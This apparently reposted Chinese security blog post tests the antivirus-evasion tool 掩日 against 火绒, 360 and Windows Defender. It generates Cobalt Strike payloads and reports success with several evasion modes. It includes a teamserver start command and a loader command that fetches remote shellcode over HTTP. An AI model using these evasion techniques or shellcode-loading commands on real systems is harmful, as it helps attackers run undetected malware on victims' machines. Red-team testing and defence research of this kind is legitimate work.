乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
更新时间:2022.05.16
本文首发乌鸦安全知识星球
1. 介绍
掩日免杀是一个非常优秀的项目,目前在4月19
号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
https://github.com/1y0n/av_evasion_tool
下载之后本地打开:(记得关闭杀软)
2. 环境配置
安装环境:Windows10
虚拟机 在这里新版本掩日采用了gcc
环境和go
环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gcc
和go
的环境:
gcc安装
gcc --version
go安装
go version
3. 环境
在作者的介绍中,针对Cobalt Strike
生成的木马要求:
针对Cobalt Strike
,不要选择生成Windows
分阶段木马、Windows
无阶段木马,而是生成payload
,最终是一个payload.c
文件。
因此在这里我们使用最常用的CS
的木马来进行操作。
3.1 环境准备
在本地启动一个CS
,服务端:
sudo ./teamserver 10.30.1.147 123
启用客户端,并新增监听,在这里使用作者建议的HTTPS
方式:
然后生成一个payload.c
文件:
3.2 测试环境
测试机:
-
• Windows10 360主动防御
-
• Windows7 火绒主动防御
-
• Windows10 开启windows Defender
其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。
4. 免杀测试
4.1 通用免杀
在这里选择直接执行的方式,并且使用隐藏窗口的模式:
此时生成成功:
4.1.1 火绒(成功)
此时没有发现问题,上线测试:
4.1.2 360(成功)
关闭360的自动上传样本功能:
然后按位置扫描,没有发现问题:
上线测试下,此时上线正常:
4.1.3 Windows Defender(失败)
此时的 Windows Defender
病毒库为最新版本:
静态测试
动态上线(被杀)
在上线之后,立刻被拦截查杀:
在这里可以发现,三个杀软中只有Windows Defender
难过,因此针对它进一步进行测试:
在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender
的时候,依旧被杀。
4.1.4 强力模式(成功)
在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU
此时静态查杀,依旧正常
动态上线正常:
4.2 分离免杀
在这里执行的时候,会生成两个文件,一个是不含shellcode
的shellcode
加载器,另外就是一个shellcode
文件(可能经过了各种加密变形)。
此时生成了两个文件:
静态查杀正常:
动态加载:
动态加载的话,不是直接双击上线的,而是在命令行中,将exe
加载,并且跟上分离文件的名称才可以:(此时没有杀软)
当有Windows Defender
的时候:
直接被动态查杀,再试试其他的方式,发现全部被杀
4.3 网络分离
将生成的shellcode
加载器放到目标机器上,并在目标机能访问到的机器上开启一个http
服务:
python3 -m http.server 802
然后在远程进行加载:
dUu.exe http://10.30.1.147:802/dUu.txt
还是被Windows Defender
杀了:
5. 总结
在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。当然Windows Defender
依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone
!
tips:加我wx,拉你入群,一起学习
扫取二维码获取
更多精彩
乌鸦安全
原文始发于微信公众号(乌鸦安全):新版掩日——免杀Windows Defender